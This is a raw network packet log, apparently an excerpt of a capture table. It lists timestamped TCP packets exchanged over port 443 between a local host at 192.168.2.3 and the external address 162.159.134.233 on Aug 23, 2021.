Aug 23, 2021 02:08:58.312202930 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312211990 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312225103 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312236071 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312247992 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312258959 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312298059 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312767982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312793016 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312813997 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312825918 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312839031 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312858105 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312863111 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312886953 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312910080 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312922955 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312932968 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312932968 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312954903 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.312958002 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312963009 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.312978029 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313002110 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313026905 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313028097 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313050032 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313051939 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313055038 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313074112 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313086033 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313091040 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313097000 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313118935 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313119888 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313142061 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313150883 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313155890 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313163996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313175917 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313185930 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313201904 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313210964 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313220024 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313235044 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313256025 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313258886 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313277960 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313287020 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313301086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313323021 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313323021 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313344955 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313349009 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313365936 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313371897 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313385963 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.313391924 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313415051 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.313426971 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.314177990 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.314201117 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.314233065 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.314266920 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.316673994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.317956924 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.317986012 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318007946 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318032980 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318036079 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318046093 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318054914 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318056107 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318078041 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318089008 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318097115 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318100929 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318121910 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318136930 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318142891 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318144083 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318152905 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318166971 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318182945 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318188906 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318203926 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318212986 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318228006 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318237066 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318259001 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318279982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318281889 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318295956 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318303108 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318325996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318329096 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318347931 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318368912 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318377018 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318383932 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318394899 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318418026 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318424940 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318434000 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318439007 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318463087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318466902 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318475008 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318485975 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318499088 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318507910 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318523884 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318531036 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318543911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318552971 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318562984 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318578959 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318583965 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318602085 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318623066 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318639994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318644047 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318649054 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318667889 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318670034 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318690062 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318691015 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318711042 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318711996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318727970 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318733931 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318747044 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318759918 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318768978 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318783045 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318804979 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318809032 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318826914 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318840027 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318849087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318866968 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318876982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318897963 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318903923 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318942070 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318959951 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318965912 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.318967104 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318978071 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.318989992 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319010973 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319013119 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319029093 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319031954 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319051981 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319066048 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319808006 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319833040 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319853067 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319854975 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319870949 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319878101 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.319902897 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.319924116 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323451996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323477983 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323502064 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323523998 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323524952 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323545933 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323564053 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323569059 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323589087 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323591948 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323592901 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323616982 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323621988 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323657990 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323662996 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323798895 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323821068 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323843002 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323853970 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323868990 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323877096 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323899031 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323904037 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323925018 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323947906 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323970079 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.323980093 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.323988914 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324001074 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324006081 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324011087 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324011087 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324014902 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324037075 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324038982 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324059010 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324062109 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324079037 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324080944 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324099064 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324105978 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324127913 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324140072 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324150085 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324167013 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324172974 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324194908 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324203014 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324217081 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324219942 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324242115 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324244976 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324266911 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324266911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324282885 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324289083 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324311018 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324312925 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324326038 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324335098 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324347973 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324357033 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324378967 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324378967 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324390888 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324404955 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324419975 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324429035 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324450016 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324456930 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324471951 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324477911 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324493885 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324495077 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324516058 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324522018 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324534893 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324537992 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324561119 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324563980 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324573994 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324584961 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324601889 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324609041 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324625969 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.324641943 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.324665070 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325094938 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325095892 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325160980 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325172901 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325200081 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325222015 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325222969 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325244904 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325249910 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325267076 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325275898 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325289965 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325311899 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325333118 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.325336933 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.325370073 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.326786041 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326829910 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326836109 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.326853037 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326872110 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.326874971 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326885939 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.326896906 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326919079 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326929092 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.326965094 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.326988935 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327008963 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327009916 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327032089 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327055931 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327078104 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327091932 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327100039 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327105045 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327107906 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327110052 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327111006 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327136993 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327161074 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327184916 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327188015 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327193022 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327205896 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327208996 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327231884 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327248096 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327254057 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327276945 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327299118 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327300072 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327303886 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327320099 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327322960 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327327013 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327348948 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327395916 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327398062 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327450037 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327476025 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327497959 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327521086 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327531099 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327543974 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327564955 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327586889 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327588081 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327591896 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327598095 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327626944 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327650070 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327658892 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327663898 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327667952 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327671051 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327707052 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327713966 CEST	49753	443	192.168.2.3	162.159.134.233
Aug 23, 2021 02:08:58.327730894 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327754021 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327775002 CEST	443	49753	162.159.134.233	192.168.2.3
Aug 23, 2021 02:08:58.327780008 CEST	49753	443	192.168.2.3	162.159.134.233
